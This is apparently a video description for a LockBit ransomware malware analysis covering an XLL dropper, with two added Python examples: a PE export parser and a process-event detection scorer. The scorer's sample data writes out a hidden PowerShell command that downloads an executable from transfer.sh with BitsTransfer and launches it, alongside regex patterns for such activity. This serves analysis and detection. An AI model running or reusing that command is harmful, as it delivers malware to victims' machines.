LockBit Ransomware - XLL Document Malware Analysis

Video Link: https://www.youtube.com/watch?v=cNP6QXXUxro
Duration: 8:42


LockBit is spreading their Ransomware via an XLL document which executes a dropper.
Support us on GH: https://guidedhacking.com/register/
Support us on Patreon: / guidedhacking
Support us on YT: / @guidedhacking

In the video we said that PEStudio uploads files to VirusTotal; this is not true. It just searches for the hash. Sorry for the confusion.

LockBit Malware Analysis - XLL Document Dropper
https://guidedhacking.com/threads/loc...

We'll begin our LockBit malware analysis by looking at what an XLL document actually is. An XLL is an Excel add-in: a DLL that exposes a small set of well-known exports which Excel calls when the add-in is loaded. For this LockBit ransomware investigation we use PEStudio to assess the XLL file. Examining the exports in PEStudio, xlAutoOpen turns up. Every XLL exports it, because it is the function Excel calls automatically as soon as the add-in loads, so the export itself is not proof of malice; what matters is that it hands the attacker code execution the moment the victim opens the file, which is why it is the first place to look.

Threat actors using XLL files often store the next stage of the malware in the PE resources. PEStudio flags three resources. The first is an Excel-DNA resource; Excel-DNA is a framework for building XLL add-ins from .NET code and packs its runtime and the add-in's assemblies into the XLL's resources, so this resource appears in any Excel-DNA add-in and is not in itself malicious. The second is oddly named and unrelated to anything Excel would normally carry, which is suspicious. The third is the one we dump and analyze to determine whether it is malicious.
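The export check described above, done without PEStudio, as an added example that is not part of the video or of GuidedHacking's own material: a pure-Python PE export parser that lists an XLL's exported names and flags the functions of the XLL interface, with xlAutoOpen marking the auto-executed entry point. The parser handles both PE32 and PE32+ images. The `build_sample_xll` helper and the `XLL_INTERFACE` set are assumptions of this example: the helper builds a synthetic minimal image purely as constructed test input (it is not a real add-in and contains no code), and the set is the documented XLL entry-point names. Resource dumping is left to PEStudio as in the video.

```python
import struct

# Exports defined by the Excel XLL add-in interface (assumed list for this example).
# Excel calls xlAutoOpen automatically when the add-in loads, so a malicious XLL
# puts its payload, or the loader for it, behind that export.
XLL_INTERFACE = {
    "xlAutoOpen", "xlAutoClose", "xlAutoAdd", "xlAutoRemove",
    "xlAutoRegister12", "xlAutoFree12", "xlAddInManagerInfo12",
}


def _sections(data, pe_off):
    """(VirtualAddress, VirtualSize, PointerToRawData, SizeOfRawData) for each section."""
    nsect = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    table = pe_off + 24 + opt_size          # section table follows the optional header
    out = []
    for i in range(nsect):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, table + 40 * i + 8)
        out.append((va, vsize, raw_ptr, raw_size))
    return out


def _rva_to_off(rva, sections):
    """Translate an RVA into a file offset using the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA %#x maps to no section" % rva)


def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")


def pe_exports(data):
    """Names in the export directory of a PE32/PE32+ image, in table order."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = pe_off + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic %#x" % magic)
    # Data directories start at +96 (PE32) or +112 (PE32+); entry 0 is the export table.
    exp_rva, _exp_size = struct.unpack_from("<II", data, opt + (96 if magic == 0x10B else 112))
    if exp_rva == 0:
        return []
    sections = _sections(data, pe_off)
    exp = _rva_to_off(exp_rva, sections)
    n_names = struct.unpack_from("<I", data, exp + 24)[0]          # NumberOfNames
    names = _rva_to_off(struct.unpack_from("<I", data, exp + 32)[0], sections)  # AddressOfNames
    return [_cstr(data, _rva_to_off(struct.unpack_from("<I", data, names + 4 * i)[0], sections))
            for i in range(n_names)]


def triage_xll(data):
    """Summarise the XLL-relevant exports the way a first PEStudio pass would."""
    exports = pe_exports(data)
    return {
        "exports": exports,
        "xll_entry_points": sorted(XLL_INTERFACE & set(exports)),
        "auto_executes": "xlAutoOpen" in exports,
    }


def build_sample_xll(names=("xlAutoOpen", "xlAutoClose")):
    """Constructed minimal PE32+ DLL with only an export table: synthetic test input, not a real XLL."""
    n, sec_rva, sec_off = len(names), 0x1000, 0x200
    funcs_rva, names_rva = sec_rva + 40, sec_rva + 40 + 4 * n
    ords_rva, str_rva = names_rva + 4 * n, names_rva + 6 * n
    strings, name_rvas = b"sample.xll\0", []
    for nm in names:
        name_rvas.append(str_rva + len(strings))
        strings += nm.encode() + b"\0"
    expdir = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, str_rva, 1, n, n, funcs_rva, names_rva, ords_rva)
    body = (expdir + b"".join(struct.pack("<I", 0x2000 + 16 * i) for i in range(n))
            + b"".join(struct.pack("<I", r) for r in name_rvas)
            + b"".join(struct.pack("<H", i) for i in range(n)) + strings).ljust(0x200, b"\0")
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)  # 1 section, DLL
    opt = struct.pack("<H", 0x20B).ljust(112, b"\0") + struct.pack("<II", sec_rva, 40) + b"\0" * 120
    sect = b".rdata\0\0" + struct.pack("<IIIIIIHHI", len(body), sec_rva, len(body), sec_off, 0, 0, 0, 0, 0x40000040)
    return (dos + coff + opt + sect).ljust(sec_off, b"\0") + body


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_xll()
    print(triage_xll(blob))
```

Run it with the path of a dumped XLL to list its exports; with no argument it triages the synthetic sample. Treat `auto_executes` as "this add-in runs code on load", not as a verdict: a benign Excel-DNA add-in produces the same result, and the verdict comes from what sits behind that export.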

Running Detect It Easy (DIE) on the dumped file reveals a .NET binary obfuscated with ConfuserEx. To analyze it, a modified version of de4dot is required to deobfuscate it first. dnSpy can then be used to start the analysis of the LockBit dropper proper, which shows obfuscated strings and two ShellExecute calls.

Deciphering the strings reveals a call to powershell.exe that uses the BitsTransfer PowerShell module to download another binary, which the same PowerShell command then runs. That file, the LockBit payload itself, is fetched from transfer.sh. Additionally, an .xlsx file can be extracted from the binary's resources with dnSpy; this is a decoy document shown to the victim so that the file they opened appears to be a legitimate spreadsheet.
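The execution chain just described (Excel loading the XLL, the dropper calling powershell.exe, BitsTransfer fetching the payload from transfer.sh and the same command launching it) is what a detection engineer would hunt for in process-creation telemetry. The following is an added example and not part of the video or GuidedHacking's material: a small scorer run over Sysmon-style process-creation events. The events, field names, indicator weights and threshold are all assumptions of this example; the events are constructed, not real telemetry.

```python
import re

# Constructed Sysmon Event ID 1 style records (ParentImage / Image / CommandLine).
# Event 1 mirrors the chain in the analysis; 2 and 3 are there to show what is NOT flagged.
SAMPLE_EVENTS = [
    {"id": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "Import-Module BitsTransfer; '
                    "Start-BitsTransfer -Source https://transfer.sh/aaaa/lb.exe -Destination $env:TEMP\\lb.exe; "
                    'Start-Process $env:TEMP\\lb.exe"'},
    {"id": 2,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"},
    {"id": 3,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
]

# The XLL runs inside Excel, so the shell it spawns has EXCEL.EXE as its parent.
OFFICE_HOSTS = {"excel.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line indicators taken from the dropper's behaviour, with assumed weights.
INDICATORS = [
    ("bits_download", re.compile(r"Start-BitsTransfer|Import-Module\s+BitsTransfer", re.I), 3),
    ("anon_file_host", re.compile(r"https?://transfer\.sh/", re.I), 3),
    ("launches_download", re.compile(r"Start-Process|Invoke-Expression|\biex\b", re.I), 2),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    if basename(ev["ParentImage"]) in OFFICE_HOSTS and basename(ev["Image"]) in SHELLS:
        score += 4                       # Office spawning a shell is the anchor of this chain
        reasons.append("office_spawns_shell")
    for name, rx, weight in INDICATORS:
        if rx.search(ev["CommandLine"]):
            score += weight
            reasons.append(name)
    return score, reasons


def detect(events, threshold=6):
    """Events whose score reaches the threshold, as (id, score, reasons)."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["id"], score, reasons))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Event 3 (Excel spawning a plain `Get-Date`) scores below the threshold on its own, which is deliberate: Excel launching PowerShell is worth a look but is not rare enough to page on, while the combination with BitsTransfer and an anonymous file host is. Lower the threshold to 4 if you want every Office-to-shell spawn surfaced for hunting.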

Follow us on Facebook : http://bit.ly/2vvHfhk
Follow us on Twitter : http://bit.ly/3bC7J1i
Follow us on Twitch : http://bit.ly/39ywOZ2
Follow us on Reddit : http://bit.ly/3bvOB57
Follow us on GitHub : http://bit.ly/2HoNXIS
Follow us on Instagram : http://bit.ly/2SoDOlu

lockbit virus
malware analysis
lockbit ransomware removal
lockbit ransomware analysis
lockbit ransomware gang
cyber security
xll document
malware
lockbit ransom
lockbit ransomware decrypt
ransomware explained
reverse engineering







Tags:
guidedhacking
lockbit ransomware
lockbit virus
malware analysis
lockbit ransomware removal
lockbit ransomware analysis
lockbit ransomware gang
cyber security
xll document
malware
lockbit dropper
lockbit ransom
lockbit ransomware decrypt
ransomware explained
reverse engineering
lockbit ransomware builder